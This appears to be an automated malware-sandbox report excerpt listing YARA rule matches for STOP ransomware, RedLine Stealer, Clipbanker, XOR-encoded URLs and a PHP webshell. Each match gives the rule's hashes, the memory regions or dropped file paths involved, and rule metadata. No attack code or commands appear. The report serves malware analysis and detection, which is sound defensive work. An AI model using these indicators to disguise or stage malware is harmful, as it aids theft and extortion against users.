Source: 00000009.00000000.345188173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.349827384.00000000004B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.348844154.000000000210E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.364455127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.315044936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.373204030.00000000020F3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000E.00000002.564552396.0000000000EE1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.318350093.00000000020FB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, type: DROPPED	Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ScreenshotOptIn.gif, type: DROPPED	Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.gif, type: DROPPED	Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, type: DROPPED	Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml, type: DROPPED	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, score = , license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-08-19
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
